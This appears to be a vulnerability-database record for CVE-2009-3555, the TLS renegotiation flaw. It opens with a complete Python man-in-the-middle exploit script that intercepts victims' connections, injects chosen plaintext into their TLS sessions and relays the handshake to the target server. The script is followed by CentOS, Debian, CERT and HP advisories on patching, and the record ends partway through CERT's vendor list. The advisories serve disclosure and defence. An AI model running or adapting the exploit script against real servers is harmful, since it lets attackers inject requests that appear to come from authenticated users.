\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555 \n# http://www.phonefactor.com/sslgap \n# http://www.extendedsubset.com/ \n# http://www.g-sec.lu/practicaltls.pdf \n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01 \n \nimport tlslite \nimport tlslite.api \nimport tlslite.messages \nimport tlslite.constants \nimport struct \nimport socket \nimport threading \nimport array \nimport sys \nimport optparse \n \n \nif not hasattr(threading.Thread, 'name'): \n# emulate python 2.6 threading module for earlier versions \nthreading.current_thread = threading.currentThread \nsetattr(threading.Thread, 'name', \nproperty(threading.Thread.getName, threading.Thread.setName)) \n \ndef forward(sock1, sock2): \nsock1.settimeout(1.0) \nwhile True: \ntry: \ndata = sock1.recv(4096) \nif not data: \nreturn \nsock2.send(data) \nexcept socket.error, ex_error: \nif ex_error[0] == 104: # Connection reset by peer \nreturn \nexcept socket.timeout, ex_timeout: \npass \n \n \nclass MessageWrapper(object): \ndef __init__(self, version = (3, 1), ssl2 = False): \nself.contentType = tlslite.messages.ContentType.handshake \nself.ssl2 = ssl2 \nself.client_version = version \n \ndef setType(self, type): \nself.contentType = type \n \ndef addBytes(self, bytes): \nself.bytes = bytes \n \ndef write(self, trial=False): \nif trial: \nraise Exception('Unsupported') \nreturn array.array('B', self.bytes) \n \ndef send_record(sock, msg_type, version_major, version_minor, record): \nmsg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record)) \nif type(record) != str: \nmsg += record.tostring() \nelse: \nmsg += record \nsock.send(msg) \n \ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)): \nmsg = MessageWrapper(version) \nmsg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes)) \nmsg.setType(type) \nfor dummy in sslsock._sendMsg(msg, True): \npass \n \ndef decrypt_record(sslsock, type, recordbytes): \nfor result in sslsock._decryptRecord(type, array.array('B', recordbytes)): \npass \nreturn result \n \ndef recv_record(sock): \ntry: \nheader = sock.recv(5) \nif not header: \nreturn None, None, None, None \nmsg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header) \nrecord = '' \nwhile len(record) != msg_length: \nrecord += sock.recv(msg_length - len(record)) \nreturn msg_type, msg_version_major, msg_version_minor, record \nexcept socket.error, ex: \nif ex[0] == 104: # Connection reset by peer \nreturn \n \ndef recv_clienthello(sock): \nheader_bytes = [] \nheader_bytes.append(sock.recv(1)) \nheader_bytes[0] = struct.unpack('!B', header_bytes[0])[0] \nif header_bytes[0] & 0x80: \n# Version 2.0 Client \"Record Layer\" \nheader_bytes.append(sock.recv(1)) \nheader_bytes[1] = struct.unpack('!B', header_bytes[1])[0] \nmsg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1] \nmsg_version_major = 2 \nmsg_version_minor = 0 \nmsg_type = tlslite.constants.ContentType.handshake \nrecord = sock.recv(msg_length) \nelse: \nheader = sock.recv(4) \nmsg_type = header_bytes[0] \nmsg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header) \nrecord = sock.recv(msg_length) \n \nreturn msg_type, msg_version_major, msg_version_minor, record \n \ndef send_hello_request(sock): \nsock.send(\"\\x16\" # Record Layer: Handshake Message \n+\"\\x03\\x01\" # Record Layer Version: TLS 1.0 \n+\"\\x00\\x04\" # Record Layer Length: 4 \n+\"\\x00\" # Handshake Message Type: Hello Request \n+\"\\x00\\x00\\x00\") # Handshake Message Length: 0 \n \ndef send_protocol_version_alert(sock): \nsock.send(\"\\x15\" # Record Layer: Alert\" \n+\"\\x03\\x01\" # Record Layer Version: TLS 1.0 \n+\"\\x00\\x02\" # Record Layer Length: 2 \n+\"\\x00\" # Alert Message: fatal \n+\"\\x46\") # Alert Message: protocol version \n \n \ndef handle_victim(victim, options, mitmcount): \n \nif options.one_shot and mitmcount != 0: \nprint threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only' \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect(options.target) \nprint threading.current_thread().name, 'Connected to target %s:%u' % options.target \nexcept socket.error, ex: \nprint threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target \nprint threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \nt1 = threading.Thread(target=forward, args=(sock, victim)) \nt1.start() \n \nt2 = threading.Thread(target=forward, args=(victim, sock)) \nt2.start() \n \nt1.join() \nsock.close() \n \nt2.join() \nvictim.close() \nreturn \n \n# obtain initial \"client hello\" message \nmsg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim) \nif msg_version_major == 2: \nprint threading.current_thread().name, \"client sent SSLv2 client hello message, exiting thread\" \nreturn \n \ntls_version = (msg_version_major, msg_version_minor) \ntype, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39]) \nresume_session = (session_id_length != 0) \nif resume_session: \nprint threading.current_thread().name, \"client attempting to resume session\" \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect(options.target) \nprint threading.current_thread().name, 'Connected to target %s:%u' % options.target \nexcept socket.error, ex: \nprint threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target \nprint threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \n \nsslsock = tlslite.api.TLSConnection(sock) \nhandshake_settings = tlslite.HandshakeSettings.HandshakeSettings() \nhandshake_settings.minVersion = tls_version \nhandshake_settings.maxVersion = tls_version \nsslsock.handshakeClientCert(settings = handshake_settings) \n \n# inject prefix \nsslsock.write(options.inject) \nprint threading.current_thread().name, 'Injected %s' % repr(options.inject) \n \n# send original \"client hello\" message over the encrypted channel \nsend_encapsulated(sslsock, 22, hello_msg, tls_version) \n \n# now receive serveral TLS messages from the server, decrypt them, and forward \n# them to the client, until the server sends \"server hello done\" \n# these messages include \"server hello\", \"certificate\", \"server key exchange\", \n# unless the client is trying to resume a previous session \nprint threading.current_thread().name, \"about to receive server handshake messages\" \nserver_handshake_done = False \nwhile not server_handshake_done: \nmsg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock) \nif result: \nresult = decrypt_record(sslsock, msg_type, result) \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, result) \nif result[0] == 0x0e: # server hello done - should terminate handshake \nserver_handshake_done = True \nelif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant \nserver_handshake_done = True \nelse: \nprint threading.current_thread().name, 'receive from server failed, exiting thread' \nreturn \nprint threading.current_thread().name, \"server handshake done\" \n \n \n# now its the the client's turn to send some messages, e.g. \n# \"client key exchange\" and \"change cipher spec\" \nprint threading.current_thread().name, \"about to receive client handshake messages\" \nhandshake_finished = False \nwhile not handshake_finished: \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(victim) \nprint threading.current_thread().name, msg_type \nsend_encapsulated(sslsock, msg_type, record, tls_version) \nif msg_type == 0x14: # change cipher spec \nhandshake_finished = True \n \nprint threading.current_thread().name, \"client handshake done\" \n \n# message after \"change cipher spec\" must be sent in the \"clear\" \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(victim) \nsend_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record) \n \n# server should now send \"change cipher spec\" message, we decrypt and send that to the victim \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock) \nresult = decrypt_record(sslsock, msg_type, record) \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, result) \n \n# finalize handshake \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock) \nif record: \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, record) \nelse: \nsslsock.sock.close() \nvictim.close() \ndel sslsock \nreturn \n \n \n \n# the rest is just forwarding TLS records between both parties, \n# which we cannot interfere with anymore, apart from dropping server \n# responses \nif options.drop: \nsslsock.sock.close() \ndel sslsock \nelse: \nt1 = threading.Thread(target=forward, args=(sslsock.sock, victim)) \nt1.start() \n \nt2 = threading.Thread(target=forward, args=(victim, sslsock.sock)) \nt2.start() \n \nif not options.drop: \nt1.join() \nsslsock.sock.close() \n \nt2.join() \nvictim.close() \n \n \n \nif __name__ == \"__main__\": \nparser = optparse.OptionParser() \nparser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443) \nparser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0') \nparser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' ) \nparser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA') \nparser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE') \nparser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA') \nparser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections') \nparser.add_option('-d', '--drop-responses', dest='drop', action=\"store_true\", default=False, help='drop server responses after renegotiating') \n \n(options, args) = parser.parse_args() \n \nif len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1: \nprint 'Exactly one injection option must be specified' \nsys.exit(1) \n \nif options.inject_file: \ntry: \noptions.inject = open(options.inject_file, 'r').read() \nexcept IOError, ex: \nprint ex \nsys.exit(1) \n \nif options.inject_base64: \nimport base64 \ntry: \noptions.inject = base64.decodestring(options.inject_base64) \nexcept base64.binascii.Error, ex: \nprint 'Error decoding base64 data: %s' % ex \nsys.exit(1) \n \n \nif not options.listen_port or \\ \nnot options.bind_address or \\ \nnot options.target or \\ \nnot options.inject: \nparser.print_help() \nsys.exit(1) \n \ntarget = options.target.split(':') \nif len(target)==2: \ntry: \ntarget[1] = int(target[1]) \nexcept ValueError: \ntarget[1] = None \nif len(target)!=2 or not target[0] or not target[1]: \nprint 'Target \\'%s\\' not in format HOST:PORT' % options.target \nsys.exit(1) \n \noptions.target = tuple(target) \n \ntry: \nlistensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nlistensocket.bind((options.bind_address, options.listen_port)) \nprint 'Listening on %s:%u' % (options.bind_address, options.listen_port) \nexcept socket.error, ex: \nprint 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port) \nprint 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \nlistensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \nlistensocket.listen(5) \n \nmitmcount = 0 \n \nwhile True: \ntry: \nvictim, victimaddr = listensocket.accept() \nprint 'New connection from %s:%u' % victimaddr \n \nthreading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start() \nmitmcount += 1 \n \nexcept KeyboardInterrupt, ex: \nprint '\\nAborted by user, exiting...' \nlistensocket.close() \nsys.exit(1) \n \n \n`\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84112/tls-reneg.py.txt"}], "centos": [{"lastseen": "2019-12-20T18:25:54", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "**CentOS Errata and Security Advisory** CESA-2010:0164\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nAll openssl097a users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. For the update to take\neffect, all services linked to the openssl097a library must be restarted,\nor the system rebooted.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028633.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028634.html\n\n**Affected packages:**\nopenssl097a\n\n**Upstream details at:**\n", "edition": 3, "modified": "2010-03-27T17:44:36", "published": "2010-03-27T17:44:36", "href": "http://lists.centos.org/pipermail/centos-announce/2010-March/028633.html", "id": "CESA-2010:0164", "title": "openssl097a security update", "type": "centos", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-12-20T18:24:56", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "**CentOS Errata and Security Advisory** CESA-2010:0165\n\n\nNetwork Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. Applications built with NSS can support SSLv2, SSLv3, TLS,\nand other security standards.\n\nNetscape Portable Runtime (NSPR) provides platform independence for non-GUI\noperating system facilities. These facilities include threads, thread\nsynchronization, normal file and network I/O, interval timing, calendar\ntime, basic memory management (malloc and free), and shared library\nlinking.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nUsers of Red Hat Certificate System 7.3 and 8.0 should review the following\nKnowledgebase article before installing this update:\nhttp://kbase.redhat.com/faq/docs/DOC-28439\n\nAll users of NSS are advised to upgrade to these updated packages, which\nupdate NSS to version 3.12.6. This erratum also updates the NSPR packages\nto the version required by NSS 3.12.6. All running applications using the\nNSS library must be restarted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028639.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028640.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028645.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028646.html\n\n**Affected packages:**\nnspr\nnspr-devel\nnss\nnss-devel\nnss-pkcs11-devel\nnss-tools\n\n**Upstream details at:**\n\nhttps://rhn.redhat.com/errata/RHSA-2010-0165.html", "edition": 3, "modified": "2010-03-28T20:10:58", "published": "2010-03-28T15:36:50", "href": "http://lists.centos.org/pipermail/centos-announce/2010-March/028640.html", "id": "CESA-2010:0165", "title": "nspr, nss security update", "type": "centos", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:15:48", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2141-3 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nJanuary 06, 2011 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : apache2\nVulnerability : backward compatibility option for SSL/TLS insecure\n renegotiation\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2009-3555\nDebian Bug : 587037\n\nDSA-2141-1 changed the behaviour of the openssl libraries in a server\nenvironment to only allow SSL/TLS renegotiation for clients that\nsupport the RFC5746 renegotiation extension. This update to apache2\nadds the new SSLInsecureRenegotiation configuration option that allows\nto restore support for insecure clients. More information can be found\nin the file /usr/share/doc/apache2.2-common/NEWS.Debian.gz .\n\nFor the stable distribution (lenny), the compatibility option has been\nincluded in version 2.2.9-10+lenny9.\n\nIn addition, apache2-mpm-itk has been rebuilt to work with the updated\napache2 packages. The new version number is 2.2.6-02-1+lenny4.\n\nFor the unstable distribution (sid), and the testing distribution\n(squeeze), the compatibility option has been included since version\n2.2.15-1.\n\nWe recommend that you upgrade your apache2 and apache2-mpm-itk\npackages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2011-01-05T23:21:10", "published": "2011-01-05T23:21:10", "id": "DEBIAN:DSA-2141-1:7D2D7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00003.html", "title": "[SECURITY] [DSA-2141-1] New apache2 packages add backward compatibility option", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-11-11T13:29:55", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2141-4 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nJanuary 12, 2011 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : compatibility problem with updated openssl\nDebian-specific: no\nCVE ID : CVE-2009-3555\nDebian Bug : 609124\n\nThe openssl update in DSA-2141-1 caused a regression in lighttpd. Due\nto a bug in lighttpd, the server fails to start in some configurations\nif using the updated openssl libraries. This update fixes this problem.\n\nFor the stable distribution (lenny), the problem has been fixed in\nversion 1.4.19-5+lenny2.\n\nThe packages for the hppa, mips, and mipsel architectures are not yet\navailable. They will be released as soon as they have been built.\n\nFor the unstable distribution (sid), and the testing distribution\n(squeeze), the problem has been fixed some time ago in version 1.4.26-3.\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2011-01-12T18:51:30", "published": "2011-01-12T18:51:30", "id": "DEBIAN:DSA-2141-4:2215A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00006.html", "title": "[SECURITY] [DSA-2141-4] New lighttpd packages fix regression", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:42:10", "bulletinFamily": "info", "cvelist": ["CVE-2009-3555"], "description": "### Overview \n\nA vulnerability exists in SSL and TLS protocols that may allow attackers to execute an arbitrary HTTP transaction.\n\n### Description \n\nThe Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols are commonly used to provide authentication, encryption, integrity, and non-repudiation services to network applications such as HTTP, IMAP, POP3, LDAP. A vulnerability in the way SSL and TLS protocols allow renegotiation requests may allow an attacker to inject plaintext into an application protocol stream. This could result in a situation where the attacker may be able to issue commands to the server that appear to be coming from a legitimate source. According to the [Network Working Group](<https://svn.resiprocate.org/rep/ietf-drafts/ekr/draft-rescorla-tls-renegotiate.txt>):\n\n_The server treats the client's initial TLS handshake as a renegotiation and thus believes that the initial data transmitted by the attacker is from the same entity as the subsequent client data._ \n \nThis issue affects SSL version 3.0 and newer and TLS version 1.0 and newer. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to inject an arbitrary amount of chosen plaintext into the beginning of the application protocol stream. This could allow and attacker to issue HTTP requests, or take action impersonating the user, among other consequences. \n \n--- \n \n### Solution \n\nUsers should contact vendors for specific patch information. \n \n--- \n \n### Vendor Information\n\n120541\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Barracuda Networks __ Affected\n\nNotified: November 05, 2009 Updated: December 17, 2009 \n\n**Statement Date: December 04, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nBarracuda Networks has published a response to this issue at the following location:\n\n&lt;<http://www.barracudanetworks.com/ns/support/tech_alert.php>&gt; \nPlease refer to the section titled \"Resolved vulnerability in the TLS/SSL protocol during session renegotiation in select Barracuda Networks products\" for more information.\n\n### Debian GNU/Linux Affected\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### GnuTLS Affected\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company __ Affected\n\nNotified: November 05, 2009 Updated: December 17, 2009 \n\n**Statement Date: December 15, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE-----` \n`Hash: SHA1` \n \n`SUPPORT COMMUNICATION - SECURITY BULLETIN` \n \n`Document ID: c01945686` \n`Version: 2` \n \n`HPSBUX02482 SSRT090249 rev.2 - HP-UX Running OpenSSL, Remote Unauthorized Data Injection, Denial of Service (DoS)` \n \n`NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.` \n \n`Release Date: 2009-11-25` \n`Last Updated: 2009-12-12` \n \n`Potential Security Impact: Remote unauthorized data injection, Denial of Service (DoS)` \n \n`Source: Hewlett-Packard Company, HP Software Security Response Team` \n \n`VULNERABILITY SUMMARY` \n`A potential security vulnerability has been identified with HP-UX OpenSSL. The vulnerability could be exploited remotely to inject unauthorized data or to create a Denial of Service (DoS).` \n \n`References: CVE-2009-3555` \n \n`SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.` \n`HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL before vA.00.09.08l.` \n \n`BACKGROUND` \n \n`CVSS 2.0 Base Metrics` \n`===========================================================` \n` Reference Base Vector Base Score` \n`CVE-2009-3555 (AV:N/AC:L/Au:N/C:N/I:P/A:P) 6.4` \n`===========================================================` \n` Information on CVSS is documented` \n` in HP Customer Notice: HPSN-2008-002` \n \n`RESOLUTION` \n \n`HP has provided upgrades to resolve this vulnerability.` \n`The upgrades are available from the following location.` \n \n`<http://software.hp.com>` \n \n`HP-UX Release` \n` Version of OpenSSL Depot` \n \n`B.11.11 PA (32 and 64)` \n` A.00.09.08l.001` \n \n`B.11.23 (PA and IA)` \n` A.00.09.08l.002` \n \n`B.11.31 (PA and IA)` \n` A.00.09.08l.003` \n \n`Note: OpenSSL vA.00.09.08l disables renegotiation. Although renegotiation is thought to be rarely used, applications should be tested to evaluate the impact of installing OpenSSL vA.00.09.08l.` \n \n`MANUAL ACTIONS: Yes - Update` \n \n`Install OpenSSL A.00.09.08l or subsequent` \n \n`PRODUCT SPECIFIC INFORMATION` \n \n`HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: <https://www.hp.com/go/swa>` \n \n`The following text is for use by the HP-UX Software Assistant.` \n \n`AFFECTED VERSIONS` \n \n`HP-UX B.11.11` \n`==================` \n`openssl.OPENSSL-CER` \n`openssl.OPENSSL-CONF` \n`openssl.OPENSSL-DOC` \n`openssl.OPENSSL-INC` \n`openssl.OPENSSL-LIB` \n`openssl.OPENSSL-MAN` \n`openssl.OPENSSL-MIS` \n`openssl.OPENSSL-PRNG` \n`openssl.OPENSSL-PVT` \n`openssl.OPENSSL-RUN` \n`openssl.OPENSSL-SRC` \n`action: install revision A.00.09.08l.001 or subsequent` \n \n`HP-UX B.11.23` \n`==================` \n`openssl.OPENSSL-CER` \n`openssl.OPENSSL-CONF` \n`openssl.OPENSSL-DOC` \n`openssl.OPENSSL-INC` \n`openssl.OPENSSL-LIB` \n`openssl.OPENSSL-MAN` \n`openssl.OPENSSL-MIS` \n`openssl.OPENSSL-PRNG` \n`openssl.OPENSSL-PVT` \n`openssl.OPENSSL-RUN` \n`openssl.OPENSSL-SRC` \n`action: install revision A.00.09.08l.002 or subsequent` \n \n`HP-UX B.11.31` \n`==================` \n`openssl.OPENSSL-CER` \n`openssl.OPENSSL-CONF` \n`openssl.OPENSSL-DOC` \n`openssl.OPENSSL-INC` \n`openssl.OPENSSL-LIB` \n`openssl.OPENSSL-MAN` \n`openssl.OPENSSL-MIS` \n`openssl.OPENSSL-PRNG` \n`openssl.OPENSSL-PVT` \n`openssl.OPENSSL-RUN` \n`openssl.OPENSSL-SRC` \n`action: install revision A.00.09.08l.003 or subsequent` \n \n`END AFFECTED VERSIONS` \n \n`HISTORY` \n`Version:1 (rev.1) 25 November 2009 Initial release` \n`Version:2 (rev.2) 14 December 2009 Revised location from which to download upgrades, fileset content.` \n`Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.` \n \n`Support: For further information, contact normal HP Services support channel.` \n \n`Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com` \n`It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.` \n`To get the security-alert PGP key, please send an e-mail message as follows:` \n` To: security-alert@hp.com` \n` Subject: get key` \n`Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:` \n`[http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC](<http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC>)` \n`On the web page: ITRC security bulletins and patch sign-up` \n`Under Step1: your ITRC security bulletins and patches` \n` -check ALL categories for which alerts are required and continue.` \n`Under Step2: your ITRC operating systems` \n` -verify your operating system selections are checked and save.` \n \n`To update an existing subscription: <http://h30046.www3.hp.com/subSignIn.php>` \n`Log in on the web page: Subscriber's choice for Business: sign-in.` \n`On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.` \n \n`To review previously published Security Bulletins visit: <http://www.itrc.hp.com/service/cki/secBullArchive.do>` \n \n`* The Software Product Category that this Security Bulletin` \n`relates to is represented by the 5th and 6th characters` \n`of the Bulletin number in the title:` \n \n`GN = HP General SW` \n`MA = HP Management Agents` \n`MI = Misc. 3rd Party SW` \n`MP = HP MPE/iX` \n`NS = HP NonStop Servers` \n`OV = HP OpenVMS` \n`PI = HP Printing & Imaging` \n`ST = HP Storage SW` \n`TL = HP Trusted Linux` \n`TU = HP Tru64 UNIX` \n`UX = HP-UX` \n`VV = HP VirtualVault` \n \n`System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.` \n \n`\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"` \n \n`Copyright 2009 Hewlett-Packard Development Company, L.P.` \n`Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.` \n`-----BEGIN PGP SIGNATURE-----` \n`Version: GnuPG v1.4.10 (GNU/Linux)` \n \n`iEYEARECAAYFAksmnlAACgkQ4B86/C0qfVkacACgpkVOgFipzlbxSDrmY0HLegCd` \n`8C8AoMKw23iAcTZCMkeMIM1QmTAyujeA` \n`=KK6o` \n`-----END PGP SIGNATURE-----`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation Affected\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### McAfee Affected\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. __ Affected\n\nNotified: November 05, 2009 Updated: November 06, 2009 \n\n**Statement Date: November 05, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSun Microsystems has published a preliminary statement about this issue in the following Sun Security Blog post:\n\n \n&lt;<http://blogs.sun.com/security/entry/vulnerability_in_tls_protocol_during>&gt;\n\n### Vendor References\n\nNone\n\n### Addendum\n\nThere are no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23120541 Feedback>).\n\n### Cryptlib __ Not Affected\n\nNotified: November 05, 2009 Updated: November 11, 2009 \n\n**Statement Date: November 10, 2009**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\ncryptlib does not allow renegotiation, it ignores requests to renegotiate as provided for in the TLS specification. It is therefore not vulnerable to this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Force10 Networks, Inc. Not Affected\n\nNotified: November 05, 2009 Updated: July 22, 2011 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### 